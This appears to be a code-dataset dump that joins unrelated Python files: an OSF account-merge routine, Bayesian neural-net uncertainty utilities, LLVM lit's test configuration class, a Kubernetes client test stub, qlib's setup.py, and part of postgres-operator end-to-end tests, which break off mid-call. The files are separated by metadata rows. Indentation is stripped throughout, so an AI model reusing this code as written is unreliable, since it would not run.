notifications_configured.update(self.notifications_configured)
self.notifications_configured = notifications_configured
for key, value in user.mailchimp_mailing_lists.iteritems():
# subscribe to each list if either user was subscribed
subscription = value or self.mailchimp_mailing_lists.get(key)
signals.user_merged.send(self, list_name=key, subscription=subscription)
# clear subscriptions for merged user
signals.user_merged.send(user, list_name=key, subscription=False, send_goodbye=False)
for target_id, timestamp in user.comments_viewed_timestamp.iteritems():
if not self.comments_viewed_timestamp.get(target_id):
self.comments_viewed_timestamp[target_id] = timestamp
elif timestamp > self.comments_viewed_timestamp[target_id]:
self.comments_viewed_timestamp[target_id] = timestamp
self.emails.extend(user.emails)
user.emails = []
for k, v in user.email_verifications.iteritems():
email_to_confirm = v['email']
if k not in self.email_verifications and email_to_confirm != user.username:
self.email_verifications[k] = v
user.email_verifications = {}
for institution in user.affiliated_institutions:
self.affiliated_institutions.append(institution)
user._affiliated_institutions = []
# FOREIGN FIELDS
for watched in user.watched:
if watched not in self.watched:
self.watched.append(watched)
user.watched = []
for account in user.external_accounts:
if account not in self.external_accounts:
self.external_accounts.append(account)
user.external_accounts = []
# - addons
# Note: This must occur before the merged user is removed as a
# contributor on the nodes, as an event hook is otherwise fired
# which removes the credentials.
for addon in user.get_addons():
user_settings = self.get_or_add_addon(addon.config.short_name)
user_settings.merge(addon)
user_settings.save()
# Disconnect signal to prevent emails being sent about being a new contributor when merging users
# be sure to reconnect it at the end of this code block. Import done here to prevent circular import error.
from website.addons.osfstorage.listeners import checkin_files_by_user
from website.project.signals import contributor_added, contributor_removed
from website.project.views.contributor import notify_added_contributor
from website.util import disconnected_from
# - projects where the user was a contributor
with disconnected_from(signal=contributor_added, listener=notify_added_contributor):
for node in user.contributed:
# Skip bookmark collection node
if node.is_bookmark_collection:
continue
# if both accounts are contributor of the same project
if node.is_contributor(self) and node.is_contributor(user):
if node.permissions[user._id] > node.permissions[self._id]:
permissions = node.permissions[user._id]
else:
permissions = node.permissions[self._id]
node.set_permissions(user=self, permissions=permissions)
visible1 = self._id in node.visible_contributor_ids
visible2 = user._id in node.visible_contributor_ids
if visible1 != visible2:
node.set_visible(user=self, visible=True, log=True, auth=Auth(user=self))
else:
node.add_contributor(
contributor=self,
permissions=node.get_permissions(user),
visible=node.get_visible(user),
log=False,
)
with disconnected_from(signal=contributor_removed, listener=checkin_files_by_user):
try:
node.remove_contributor(
contributor=user,
auth=Auth(user=self),
log=False,
)
except ValueError:
logger.error('Contributor {0} not in list on node {1}'.format(
user._id, node._id
))
node.save()
# - projects where the user was the creator
for node in user.created:
node.creator = self
node.save()
# - file that the user has checked_out, import done here to prevent import error
from website.files.models.base import FileNode
for file_node in FileNode.files_checked_out(user=user):
file_node.checkout = self
file_node.save()
# finalize the merge
remove_sessions_for_user(user)
# - username is set to None so the resultant user can set it primary
# in the future.
user.username = None
user.password = None
user.verification_key = None
user.osf_mailing_lists = {}
user.merged_by = self
user.save()
def get_projects_in_common(self, other_user, primary_keys=True):
"""Returns either a collection of "shared projects" (projects that both users are contributors for)
or just their primary keys
"""
if primary_keys:
projects_contributed_to = set(self.contributed.get_keys())
other_projects_primary_keys = set(other_user.contributed.get_keys())
return projects_contributed_to.intersection(other_projects_primary_keys)
else:
projects_contributed_to = set(self.contributed)
return projects_contributed_to.intersection(other_user.contributed)
def n_projects_in_common(self, other_user):
"""Returns number of "shared projects" (projects that both users are contributors for)"""
return len(self.get_projects_in_common(other_user, primary_keys=True))
def is_affiliated_with_institution(self, inst):
return inst in self.affiliated_institutions
def remove_institution(self, inst_id):
removed = False
for inst in self.affiliated_institutions:
if inst._id == inst_id:
self.affiliated_institutions.remove(inst)
removed = True
return removed
_affiliated_institutions = fields.ForeignField('node', list=True)
@property
def affiliated_institutions(self):
from website.institutions.model import Institution, AffiliatedInstitutionsList
return AffiliatedInstitutionsList([Institution(inst) for inst in self._affiliated_institutions], obj=self, private_target='_affiliated_institutions')
def get_node_comment_timestamps(self, target_id):
""" Returns the timestamp for when comments were last viewed on a node, file or wiki.
"""
default_timestamp = dt.datetime(1970, 1, 1, 12, 0, 0)
return self.comments_viewed_timestamp.get(target_id, default_timestamp)
def _merge_into_reversed(*iterables):
'''Merge multiple sorted inputs into a single output in reverse order.
'''
return sorted(itertools.chain(*iterables), reverse=True)
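# Example (editor's sketch): merging reverse-chronological id lists keeps the
# combined result sorted newest-first, e.g.
#   _merge_into_reversed([5, 3, 1], [4, 2])  ->  [5, 4, 3, 2, 1]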
| 36.849406
| 157
| 0.625811
|
7d6381e1bf3e8720f96182907732dc40465fb5d9
| 7,072
|
py
|
Python
|
CBLN/bnn/train_utils.py
|
Honglin20/Thesis
|
ec344f82d8200ce006082ad32d75a905314be77e
|
[
"MIT"
] | null | null | null |
CBLN/bnn/train_utils.py
|
Honglin20/Thesis
|
ec344f82d8200ce006082ad32d75a905314be77e
|
[
"MIT"
] | null | null | null |
CBLN/bnn/train_utils.py
|
Honglin20/Thesis
|
ec344f82d8200ce006082ad32d75a905314be77e
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
import numpy as np
def reduce_entropy(X, axis=-1):
"""
Calculate the entropy over the given axis and reduce that axis.
:param X: array of probabilities
:param axis: axis along which the entropy is computed
:return: entropy with the given axis reduced
"""
return -1 * np.sum(X * np.log(X+1E-12), axis=axis)
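# Quick sanity check (editor's sketch, not in the original file): the entropy of
# a uniform distribution over K classes is log(K), e.g.
#   reduce_entropy(np.full((1, 4), 0.25), axis=-1)  ->  array([1.3862...])  # ln(4)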
def calc_risk(preds, labels=None):
"""
Calculates the parameters we can possibly use to examine risk of a neural net
:param preds: preds in shape [num_runs, num_batch, num_classes]
:param labels:
:return:
"""
#if isinstance(preds, list):
# preds = np.stack(preds)
# preds in shape [num_runs, num_batch, num_classes]
num_runs, num_batch = preds.shape[:2]
ave_preds = np.mean(preds, axis=0)
pred_class = np.argmax(ave_preds, axis=1)
# entropy of the posterior predictive
entropy = reduce_entropy(ave_preds, axis=1)
# Expected entropy of the predictive under the parameter posterior
entropy_exp = np.mean(reduce_entropy(preds, axis=2), axis=0)
mutual_info = entropy - entropy_exp # Equation 2 of https://arxiv.org/pdf/1711.08244.pdf
# Average and variance of softmax for the predicted class
variance = np.std(preds[:, range(num_batch), pred_class], 0)
ave_softmax = np.mean(preds[:, range(num_batch), pred_class], 0)
# And calculate accuracy if we know the labels
if labels is not None:
correct = np.equal(pred_class, labels)
else:
correct = None
predictive_score = ave_preds[np.arange(num_batch),pred_class]
return [entropy, mutual_info, variance, ave_softmax, correct,predictive_score]
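# Hedged usage sketch (editor's addition; `model_sample` is hypothetical):
#   preds = np.stack([model_sample(x_batch) for _ in range(10)])  # [runs, batch, classes]
#   entropy, mutual_info, variance, ave_softmax, correct, score = calc_risk(preds, labels)
# High `mutual_info` flags inputs where the posterior samples disagree (epistemic
# uncertainty), while `entropy` also reflects aleatoric noise in the averaged prediction.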
def em_predict(predictions,y):
avg_pred = np.mean(predictions,axis=0)
risk = calc_risk(predictions)
acc = np.mean(np.equal(np.argmax(y,1), np.argmax(avg_pred, axis=-1)))
return acc,risk,risk[-1]
def eval(net,sess,num_task,writer,test_init,test_accs,params_idx=None,disp=True,record=True):
avg_acc_all = 0.0
current_acc = 0.0
for test_idx in range(num_task):
sess.run(test_init[test_idx])
if params_idx is not None:
#improving
net.set_task_params(sess,params_idx[test_idx])
avg_acc = 0.0
#for _ in range(1000):
num_test = 0
while True:
try:
if writer is not None:
acc,summaries,step = sess.run([net.accuracy,net.summary_op,net.gstep])#,feed_dict={x:batch[0],y_:batch[1]})
else:
acc,step = sess.run([net.accuracy,net.gstep])
num_test += 1
avg_acc += acc
except tf.errors.OutOfRangeError:
break
if writer is not None:
writer.add_summary(summaries,global_step = step)
if record:
test_accs[test_idx].append(avg_acc / num_test)
avg_acc_all += avg_acc / num_test
if record:
test_accs['avg'].append(avg_acc_all / num_task)
return avg_acc_all / num_task
def em_eval(net,sess,num_task,writer,testsets,test_accs,disp=True,record=True,num_runs=200,search_best=True):
def make_prediction(data,label):
predictions = []
total_acc = 0.0
for _ in range(num_runs):
pred, em_acc = sess.run([net.predictions,net.em_accuracy],feed_dict={net.x_placeholder:data,net.y_placeholder:label})
predictions.append(pred)
total_acc += em_acc
return np.array(predictions),total_acc/num_runs
avg_acc_all = 0.0
params_idx_list = []
total_iter = num_task * len(net.params_mean.keys())
iter_step = 0
correct = True
for test_idx in range(num_task):
avg_acc = []
avg_uncertainty = []
for params_idx in net.params_mean.keys():
print('Getting Index {}/{} ...'.format(iter_step,total_iter),end='\r')
iter_step += 1
net.set_task_params(sess,params_idx)
avg_acc.append(0.0)
avg_uncertainty.append(0.0)
for iters in range(1):
pred_idx = np.random.choice(np.arange(testsets[test_idx][0].shape[0]),200)
test_data = testsets[test_idx][0][pred_idx]
test_label = testsets[test_idx][1][pred_idx]
#while True:
try:
predictions,acc = make_prediction(test_data,test_label)
step = sess.run(net.gstep)
acc,uncertainty,scores = em_predict(predictions,test_label)
except tf.errors.OutOfRangeError:
pass
avg_uncertainty[params_idx] += uncertainty[2]
info = 'Task {} : {} th set of parameters has minimal uncertainty : Correct !'.format(test_idx,np.argmin(np.mean(avg_uncertainty,axis=1)))
params_idx_list.append(np.argmin(np.mean(avg_uncertainty,axis=1)))
min_idx = np.argmin(np.mean(avg_uncertainty,axis=1))
if search_best and min_idx != test_idx and num_task<10:
correct = False
info = 'Task {} : {} th set of parameters has minimal uncertainty : Wrong !'.format(test_idx,np.argmin(np.mean(avg_uncertainty,axis=1)))
print(info)
print('The model cannot identify the test data correctly ...')
print('Search for a new model, {} th running start ...'.format(net.num_runs+1))
net.num_runs += 1
break
print(info)
return params_idx_list,correct
def em_train(model,sess,num_epoch,trainset,testsets,train_init,test_init,lams=[0.01],search_best=True):
model.initialize_default_params(sess)
dp = False
test_accs = {}
test_accs['avg'] = []
for t in range(len(testsets)):
test_accs[t] = []
print('Training start ...')
#writer = tf.summary.FileWriter(graph_path,tf.get_default_graph())
writer = None
num_task = len(trainset)
sess.run(model.lams.assign(lams[0]))
for idx in range(num_task):
model.reset(sess)
print('Training {} th Task ...'.format(idx+1))
# Training Start
for e in range(num_epoch):
sess.run(train_init[idx])
try:
while True:
_,step = sess.run([model.train_op,model.gstep])
except tf.errors.OutOfRangeError:
pass
model.store_params(idx)
print('Merging Process Start ... ')
model.st_smooth(n_component=num_task,dp=dp,thresh_hold=0.5/num_task)
print('Evaluating the Uncertainty ... ')
param_idx,correct = em_eval(model,sess,num_task,None,testsets,test_accs,record=False,disp=False,search_best=search_best)
if correct:
acc = eval(model,sess,num_task,None,test_init,test_accs,params_idx=param_idx,record=True,disp=False)
print('Find the best model after searching {} times, Final Average Accuracy for all the Tasks : {}'.format(model.num_runs,acc))
else:
em_train(model,sess,num_epoch,trainset,testsets,train_init,test_init,lams=[0],search_best=search_best)
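# Editor's summary sketch (not in the original file): em_train() trains and stores
# one set of weights per task, merges them with st_smooth(), and then uses em_eval()
# to pick, for each test set, the parameter index whose Monte-Carlo predictions show
# the lowest variance. If that index disagrees with the true task id (and search_best
# is set), the whole procedure restarts with lams=[0].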
| 35.898477
| 147
| 0.617647
|
4a34b77e175b9584e6ce1eedc8c23f0bcbe4a9e7
| 5,640
|
py
|
Python
|
llvm/3.4.2/llvm-3.4.2.src/utils/lit/lit/TestingConfig.py
|
tangyibin/goblin-core
|
1940db6e95908c81687b2b22ddd9afbc8db9cdfe
|
[
"BSD-3-Clause"
] | 36
|
2015-01-13T19:34:04.000Z
|
2022-03-07T22:22:15.000Z
|
llvm/3.4.2/llvm-3.4.2.src/utils/lit/lit/TestingConfig.py
|
tangyibin/goblin-core
|
1940db6e95908c81687b2b22ddd9afbc8db9cdfe
|
[
"BSD-3-Clause"
] | 7
|
2015-10-20T19:05:01.000Z
|
2021-11-13T14:55:47.000Z
|
llvm/3.4.2/llvm-3.4.2.src/utils/lit/lit/TestingConfig.py
|
tangyibin/goblin-core
|
1940db6e95908c81687b2b22ddd9afbc8db9cdfe
|
[
"BSD-3-Clause"
] | 18
|
2015-04-23T20:59:52.000Z
|
2021-11-18T20:06:39.000Z
|
import os
import sys
PY2 = sys.version_info[0] < 3
class TestingConfig:
""""
TestingConfig - Information on the tests inside a suite.
"""
@staticmethod
def fromdefaults(litConfig):
"""
fromdefaults(litConfig) -> TestingConfig
Create a TestingConfig object with default values.
"""
# Set the environment based on the command line arguments.
environment = {
'LIBRARY_PATH' : os.environ.get('LIBRARY_PATH',''),
'LD_LIBRARY_PATH' : os.environ.get('LD_LIBRARY_PATH',''),
'PATH' : os.pathsep.join(litConfig.path +
[os.environ.get('PATH','')]),
'SYSTEMROOT' : os.environ.get('SYSTEMROOT',''),
'TERM' : os.environ.get('TERM',''),
'LLVM_DISABLE_CRASH_REPORT' : '1',
}
if sys.platform == 'win32':
environment.update({
'INCLUDE' : os.environ.get('INCLUDE',''),
'PATHEXT' : os.environ.get('PATHEXT',''),
'PYTHONUNBUFFERED' : '1',
'TEMP' : os.environ.get('TEMP',''),
'TMP' : os.environ.get('TMP',''),
})
# The option to preserve TEMP, TMP, and TMPDIR.
# This is intended to check how many temporary files would be generated
# (and be not cleaned up) in automated builders.
if 'LIT_PRESERVES_TMP' in os.environ:
environment.update({
'TEMP' : os.environ.get('TEMP',''),
'TMP' : os.environ.get('TMP',''),
'TMPDIR' : os.environ.get('TMPDIR',''),
})
# Set the default available features based on the LitConfig.
available_features = []
if litConfig.useValgrind:
available_features.append('valgrind')
if litConfig.valgrindLeakCheck:
available_features.append('vg_leak')
return TestingConfig(None,
name = '<unnamed>',
suffixes = set(),
test_format = None,
environment = environment,
substitutions = [],
unsupported = False,
test_exec_root = None,
test_source_root = None,
excludes = [],
available_features = available_features,
pipefail = True)
def load_from_path(self, path, litConfig):
"""
load_from_path(path, litConfig)
Load the configuration module at the provided path into the given config
object.
"""
# Load the config script data.
f = open(path)
try:
data = f.read()
except:
litConfig.fatal('unable to load config file: %r' % (path,))
f.close()
# Execute the config script to initialize the object.
cfg_globals = dict(globals())
cfg_globals['config'] = self
cfg_globals['lit_config'] = litConfig
cfg_globals['__file__'] = path
try:
if PY2:
exec("exec data in cfg_globals")
else:
exec(data, cfg_globals)
if litConfig.debug:
litConfig.note('... loaded config %r' % path)
except SystemExit:
e = sys.exc_info()[1]
# We allow normal system exit inside a config file to just
# return control without error.
if e.args:
raise
except:
import traceback
litConfig.fatal(
'unable to parse config file %r, traceback: %s' % (
path, traceback.format_exc()))
self.finish(litConfig)
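# A minimal config script consumed by load_from_path() might look like the sketch
# below (editor's illustration; the suite name, suffixes, and paths are hypothetical):
#
#   import lit.formats
#   config.name = 'MySuite'
#   config.suffixes = ['.ll', '.c']
#   config.test_format = lit.formats.ShTest(execute_external=False)
#   config.test_source_root = os.path.dirname(__file__)
#
# Inside the exec()'d script, `config` is this TestingConfig instance and
# `lit_config` is the surrounding LitConfig object.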
def __init__(self, parent, name, suffixes, test_format,
environment, substitutions, unsupported,
test_exec_root, test_source_root, excludes,
available_features, pipefail):
self.parent = parent
self.name = str(name)
self.suffixes = set(suffixes)
self.test_format = test_format
self.environment = dict(environment)
self.substitutions = list(substitutions)
self.unsupported = unsupported
self.test_exec_root = test_exec_root
self.test_source_root = test_source_root
self.excludes = set(excludes)
self.available_features = set(available_features)
self.pipefail = pipefail
def finish(self, litConfig):
"""finish() - Finish this config object, after loading is complete."""
self.name = str(self.name)
self.suffixes = set(self.suffixes)
self.environment = dict(self.environment)
self.substitutions = list(self.substitutions)
if self.test_exec_root is not None:
# FIXME: This should really only be suite in test suite config
# files. Should we distinguish them?
self.test_exec_root = str(self.test_exec_root)
if self.test_source_root is not None:
# FIXME: This should really only be suite in test suite config
# files. Should we distinguish them?
self.test_source_root = str(self.test_source_root)
self.excludes = set(self.excludes)
@property
def root(self):
"""root attribute - The root configuration for the test suite."""
if self.parent is None:
return self
else:
return self.parent.root
| 37.105263
| 80
| 0.537589
|
ddfdb7b32bc3448dc2d1c16ba1090aec87e79449
| 1,002
|
py
|
Python
|
kubernetes/test/test_v1beta2_deployment_spec.py
|
iamneha/python
|
5b208a1a49a8d6f8bbab28bcc226b9ef793bcbd0
|
[
"Apache-2.0"
] | 1
|
2019-02-17T15:28:39.000Z
|
2019-02-17T15:28:39.000Z
|
kubernetes/test/test_v1beta2_deployment_spec.py
|
iamneha/python
|
5b208a1a49a8d6f8bbab28bcc226b9ef793bcbd0
|
[
"Apache-2.0"
] | null | null | null |
kubernetes/test/test_v1beta2_deployment_spec.py
|
iamneha/python
|
5b208a1a49a8d6f8bbab28bcc226b9ef793bcbd0
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.13.4
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.models.v1beta2_deployment_spec import V1beta2DeploymentSpec
class TestV1beta2DeploymentSpec(unittest.TestCase):
""" V1beta2DeploymentSpec unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testV1beta2DeploymentSpec(self):
"""
Test V1beta2DeploymentSpec
"""
# FIXME: construct object with mandatory attributes with example values
#model = kubernetes.client.models.v1beta2_deployment_spec.V1beta2DeploymentSpec()
pass
if __name__ == '__main__':
unittest.main()
| 22.266667
| 105
| 0.720559
|
cc495824eb3e5e3110d1ba5eb004e7ff03a24d63
| 3,287
|
py
|
Python
|
setup.py
|
aqts/qlib
|
2c5864204ecc747f11a63574efd07ff237123ff3
|
[
"MIT"
] | 2
|
2021-01-28T09:02:14.000Z
|
2021-04-16T18:02:22.000Z
|
setup.py
|
Xryi/qlib
|
2c5864204ecc747f11a63574efd07ff237123ff3
|
[
"MIT"
] | 1
|
2021-05-16T14:17:56.000Z
|
2021-05-19T07:07:20.000Z
|
setup.py
|
Xryi/qlib
|
2c5864204ecc747f11a63574efd07ff237123ff3
|
[
"MIT"
] | 1
|
2020-12-10T03:58:33.000Z
|
2020-12-10T03:58:33.000Z
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import io
import os
import numpy
from setuptools import find_packages, setup, Extension
# Package meta-data.
NAME = "pyqlib"
DESCRIPTION = "A Quantitative-research Platform"
REQUIRES_PYTHON = ">=3.5.0"
VERSION = "0.6.0.dev"
# Detect Cython
try:
import Cython
ver = Cython.__version__
_CYTHON_INSTALLED = ver >= "0.28"
except ImportError:
_CYTHON_INSTALLED = False
if not _CYTHON_INSTALLED:
print("Required Cython version >= 0.28 is not detected!")
print('Please run "pip install --upgrade cython" first.')
exit(-1)
# What packages are required for this module to be executed?
# `estimator` may depend on other packages. To keep the dependency list small, those are not listed here.
REQUIRED = [
"numpy>=1.12.0",
"pandas>=0.25.1",
"scipy>=1.0.0",
"requests>=2.18.0",
"sacred>=0.7.4",
"pymongo==3.7.2",
"python-socketio==3.1.2",
"redis>=3.0.1",
"python-redis-lock>=3.3.1",
"schedule>=0.6.0",
"cvxpy==1.0.21",
"hyperopt==0.1.1",
"fire>=0.3.1",
"statsmodels",
"xlrd>=1.0.0",
"plotly==4.12.0",
"matplotlib==3.1.3",
"tables>=3.6.1",
"pyyaml>=5.3.1",
"mlflow>=1.12.1",
"tqdm",
"loguru",
"lightgbm",
"tornado",
"joblib>=0.17.0",
"fire>=0.3.1",
"ruamel.yaml>=0.16.12",
]
# Numpy include
NUMPY_INCLUDE = numpy.get_include()
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, "README.md"), encoding="utf-8") as f:
long_description = f.read()
# Cython Extensions
extensions = [
Extension(
"qlib.data._libs.rolling",
["qlib/data/_libs/rolling.pyx"],
language="c++",
include_dirs=[NUMPY_INCLUDE],
),
Extension(
"qlib.data._libs.expanding",
["qlib/data/_libs/expanding.pyx"],
language="c++",
include_dirs=[NUMPY_INCLUDE],
),
]
# Where the magic happens:
setup(
name=NAME,
version=VERSION,
license="MIT Licence",
url="https://github.com/microsoft/qlib",
description=DESCRIPTION,
long_description=long_description,
long_description_content_type="text/markdown",
python_requires=REQUIRES_PYTHON,
packages=find_packages(exclude=("tests",)),
# if your package is a single module, use this instead of 'packages':
# py_modules=['qlib'],
entry_points={
# 'console_scripts': ['mycli=mymodule:cli'],
"console_scripts": [
"qrun=qlib.workflow.cli:run",
],
},
ext_modules=extensions,
install_requires=REQUIRED,
include_package_data=True,
classifiers=[
# Trove classifiers
# Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
# 'License :: OSI Approved :: MIT License',
"Operating System :: POSIX :: Linux",
"Operating System :: Microsoft :: Windows",
"Operating System :: MacOS",
"License :: OSI Approved :: MIT License",
"Development Status :: 3 - Alpha",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
],
)
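# Hedged usage note (editor's addition): with numpy and Cython installed, the two
# .pyx extensions declared above are typically compiled during installation, e.g.
#   pip install .                        # or: python setup.py build_ext --inplace
# either of which builds qlib/data/_libs/rolling and qlib/data/_libs/expanding.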
| 26.296
| 100
| 0.616672
|
44cca9919169f5efaefa858a512376e1c3ba9875
| 56,258
|
py
|
Python
|
e2e/tests/test_e2e.py
|
flant/postgres-operator
|
040a49a922eead59c342a465446591ddbf90a57b
|
[
"MIT"
] | 11
|
2020-09-25T11:30:49.000Z
|
2021-12-08T20:49:14.000Z
|
e2e/tests/test_e2e.py
|
flant/postgres-operator
|
040a49a922eead59c342a465446591ddbf90a57b
|
[
"MIT"
] | null | null | null |
e2e/tests/test_e2e.py
|
flant/postgres-operator
|
040a49a922eead59c342a465446591ddbf90a57b
|
[
"MIT"
] | 1
|
2022-02-03T18:05:30.000Z
|
2022-02-03T18:05:30.000Z
|
import json
import unittest
import time
import timeout_decorator
import os
import yaml
from datetime import datetime
from kubernetes import client
from tests.k8s_api import K8s
from kubernetes.client.rest import ApiException
SPILO_CURRENT = "registry.opensource.zalan.do/acid/spilo-13-e2e:0.3"
SPILO_LAZY = "registry.opensource.zalan.do/acid/spilo-13-e2e:0.4"
def to_selector(labels):
return ",".join(["=".join(lbl) for lbl in labels.items()])
def clean_list(values):
# values are unstripped bytes; strip each and convert it to a string
clean = lambda v: v.strip().decode()
notNone = lambda v: v
return list(filter(notNone, map(clean, values)))
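# Small illustration (editor's sketch): label dicts become comma-separated
# Kubernetes label selectors, e.g.
#   to_selector({'application': 'spilo', 'spilo-role': 'master'})
#   ->  'application=spilo,spilo-role=master'   (insertion order on Python 3.7+)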
class EndToEndTestCase(unittest.TestCase):
'''
Test interaction of the operator with multiple K8s components.
'''
# `kind` pods may get stuck in the `Terminating` phase for a few minutes; hence the high test timeout
TEST_TIMEOUT_SEC = 600
def eventuallyEqual(self, f, x, m, retries=60, interval=2):
while True:
try:
y = f()
self.assertEqual(y, x, m.format(y))
return True
except AssertionError:
retries = retries - 1
if not retries > 0:
raise
time.sleep(interval)
def eventuallyNotEqual(self, f, x, m, retries=60, interval=2):
while True:
try:
y = f()
self.assertNotEqual(y, x, m.format(y))
return True
except AssertionError:
retries = retries - 1
if not retries > 0:
raise
time.sleep(interval)
def eventuallyTrue(self, f, m, retries=60, interval=2):
while True:
try:
self.assertTrue(f(), m)
return True
except AssertionError:
retries = retries - 1
if not retries > 0:
raise
time.sleep(interval)
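# Hedged usage sketch (editor's addition): these helpers poll a callable until it
# matches the expectation or the retries are exhausted, e.g.
#   self.eventuallyEqual(lambda: k8s.count_running_pods(), 2,
#                        "Expected 2 running pods, found {}")
# On failure the message is formatted with the last observed value.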
@classmethod
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def setUpClass(cls):
'''
Deploy operator to a "kind" cluster created by run.sh using examples from /manifests.
This operator deployment is to be shared among all tests.
run.sh deletes the 'kind' cluster after successful run along with all operator-related entities.
In the case of test failure the cluster will stay to enable manual examination;
next invocation of "make test" will re-create it.
'''
print("Test Setup being executed")
# set a single K8s wrapper for all tests
k8s = cls.k8s = K8s()
# remove existing local storage class and create hostpath class
try:
k8s.api.storage_v1_api.delete_storage_class("standard")
except ApiException as e:
print("Failed to delete the 'standard' storage class: {0}".format(e))
# operator deploys pod service account there on start up
# needed for test_multi_namespace_support()
cls.test_namespace = "test"
try:
v1_namespace = client.V1Namespace(metadata=client.V1ObjectMeta(name=cls.test_namespace))
k8s.api.core_v1.create_namespace(v1_namespace)
except ApiException as e:
print("Failed to create the '{0}' namespace: {1}".format(cls.test_namespace, e))
# submit the most recent operator image built on the Docker host
with open("manifests/postgres-operator.yaml", 'r+') as f:
operator_deployment = yaml.safe_load(f)
operator_deployment["spec"]["template"]["spec"]["containers"][0]["image"] = os.environ['OPERATOR_IMAGE']
with open("manifests/postgres-operator.yaml", 'w') as f:
yaml.dump(operator_deployment, f, Dumper=yaml.Dumper)
with open("manifests/configmap.yaml", 'r+') as f:
configmap = yaml.safe_load(f)
configmap["data"]["workers"] = "1"
configmap["data"]["docker_image"] = SPILO_CURRENT
with open("manifests/configmap.yaml", 'w') as f:
yaml.dump(configmap, f, Dumper=yaml.Dumper)
for filename in ["operator-service-account-rbac.yaml",
"postgresql.crd.yaml",
"operatorconfiguration.crd.yaml",
"postgresteam.crd.yaml",
"configmap.yaml",
"postgres-operator.yaml",
"api-service.yaml",
"infrastructure-roles.yaml",
"infrastructure-roles-new.yaml",
"e2e-storage-class.yaml"]:
result = k8s.create_with_kubectl("manifests/" + filename)
print("stdout: {}, stderr: {}".format(result.stdout, result.stderr))
k8s.wait_for_operator_pod_start()
# reset taints and tolerations
k8s.api.core_v1.patch_node("postgres-operator-e2e-tests-worker", {"spec": {"taints": []}})
k8s.api.core_v1.patch_node("postgres-operator-e2e-tests-worker2", {"spec": {"taints": []}})
# make sure we start a new operator on every new run,
# this tackles the problem when kind is reused
# and the Docker image is in fact changed (dirty one)
k8s.update_config({}, step="TestSuite Startup")
actual_operator_image = k8s.api.core_v1.list_namespaced_pod(
'default', label_selector='name=postgres-operator').items[0].spec.containers[0].image
print("Tested operator image: {}".format(actual_operator_image)) # shows up after tests finish
result = k8s.create_with_kubectl("manifests/minimal-postgres-manifest.yaml")
print('stdout: {}, stderr: {}'.format(result.stdout, result.stderr))
try:
k8s.wait_for_pod_start('spilo-role=master')
k8s.wait_for_pod_start('spilo-role=replica')
except timeout_decorator.TimeoutError:
print('Operator log: {}'.format(k8s.get_operator_log()))
raise
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_overwrite_pooler_deployment(self):
self.k8s.create_with_kubectl("manifests/minimal-fake-pooler-deployment.yaml")
self.eventuallyEqual(lambda: self.k8s.get_operator_state(), {"0": "idle"}, "Operator does not get in sync")
self.eventuallyEqual(lambda: self.k8s.get_deployment_replica_count(name="acid-minimal-cluster-pooler"), 1,
"Initial broken deployment not rolled out")
self.k8s.api.custom_objects_api.patch_namespaced_custom_object(
'acid.zalan.do', 'v1', 'default',
'postgresqls', 'acid-minimal-cluster',
{
'spec': {
'enableConnectionPooler': True
}
})
self.eventuallyEqual(lambda: self.k8s.get_operator_state(), {"0": "idle"}, "Operator does not get in sync")
self.eventuallyEqual(lambda: self.k8s.get_deployment_replica_count(name="acid-minimal-cluster-pooler"), 2,
"Operator did not succeed in overwriting labels")
self.k8s.api.custom_objects_api.patch_namespaced_custom_object(
'acid.zalan.do', 'v1', 'default',
'postgresqls', 'acid-minimal-cluster',
{
'spec': {
'enableConnectionPooler': False
}
})
self.eventuallyEqual(lambda: self.k8s.get_operator_state(), {"0": "idle"}, "Operator does not get in sync")
self.eventuallyEqual(lambda: self.k8s.count_running_pods("connection-pooler=acid-minimal-cluster-pooler"),
0, "Pooler pods not scaled down")
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_enable_disable_connection_pooler(self):
'''
Start with a database without a connection pooler, then turn the pooler on,
scale it up, and turn it off and on again. Test different ways of doing this
(via enableConnectionPooler or the connectionPooler configuration section).
At the end, turn the connection pooler off so it does not interfere with
other tests.
'''
k8s = self.k8s
self.eventuallyEqual(lambda: k8s.get_operator_state(), {"0": "idle"}, "Operator does not get in sync")
k8s.api.custom_objects_api.patch_namespaced_custom_object(
'acid.zalan.do', 'v1', 'default',
'postgresqls', 'acid-minimal-cluster',
{
'spec': {
'enableConnectionPooler': True,
'enableReplicaConnectionPooler': True,
}
})
self.eventuallyEqual(lambda: k8s.get_deployment_replica_count(), 2,
"Deployment replicas is 2 default")
self.eventuallyEqual(lambda: k8s.count_running_pods(
"connection-pooler=acid-minimal-cluster-pooler"),
2, "No pooler pods found")
self.eventuallyEqual(lambda: k8s.count_running_pods(
"connection-pooler=acid-minimal-cluster-pooler-repl"),
2, "No pooler replica pods found")
self.eventuallyEqual(lambda: k8s.count_services_with_label(
'application=db-connection-pooler,cluster-name=acid-minimal-cluster'),
2, "No pooler service found")
self.eventuallyEqual(lambda: k8s.count_secrets_with_label('application=db-connection-pooler,cluster-name=acid-minimal-cluster'),
1, "Pooler secret not created")
# Turn off only master connection pooler
k8s.api.custom_objects_api.patch_namespaced_custom_object(
'acid.zalan.do', 'v1', 'default',
'postgresqls', 'acid-minimal-cluster',
{
'spec': {
'enableConnectionPooler': False,
'enableReplicaConnectionPooler': True,
}
})
self.eventuallyEqual(lambda: k8s.get_operator_state(), {"0": "idle"},
"Operator does not get in sync")
self.eventuallyEqual(lambda: k8s.get_deployment_replica_count(name="acid-minimal-cluster-pooler-repl"), 2,
"Deployment replicas is 2 default")
self.eventuallyEqual(lambda: k8s.count_running_pods(
"connection-pooler=acid-minimal-cluster-pooler"),
0, "Master pooler pods not deleted")
self.eventuallyEqual(lambda: k8s.count_running_pods(
